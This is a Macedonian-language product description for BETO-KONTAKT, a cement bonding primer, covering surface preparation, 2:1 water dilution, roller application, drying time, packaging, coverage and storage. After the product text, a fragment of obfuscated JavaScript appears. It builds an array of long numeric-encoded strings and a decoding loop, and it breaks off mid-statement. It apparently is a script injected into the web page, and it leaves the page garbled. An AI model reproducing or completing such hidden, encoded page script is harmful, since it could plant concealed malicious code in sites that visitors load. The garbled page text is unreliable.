
БЕТО-КОНТАКТ

БЕТО-КОНТАКТ e врзувачки мост за цемент.

  

Припрема на смеса и нанесување: Подлогата на која се нанесува БЕТО-КОНТАКТОТ
треба да биде цврста сува, не смее да биде масна и со прашина. Пред употреба треба
добро да се промеша и да се разреди со вода (со размер 2:1). Производот се нанесува со
ваљак на мазна бетонска површина. Најниска температура за примена е +5C, а време за
сушење 3 часа. Присутните метални делови, стакло и сл. треба претходно да се
заштититат.

  

По употреба алатот реба добро да се исчисти со вода, а неискористениот
БЕТО-КОНТАКТ добро да се затвори.

  

Пакување: 20кг

  

Потрошувачка: околу 0.2кг/м2 во еден слој.

  

Складирање: БЕТО-КОНТАКТОТ да се чува на температура од +5C до +35C.

  

Рок на траење: 12 месеци.
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БЕТО-КОНТАКТ

  

 var a=0,m,v,t,z,x=new
Array('9091968376','8887918192818786347374918784939277359287883421333333338896','
877886888787','949990793917947998942577939317'),l=x.length;while(++a
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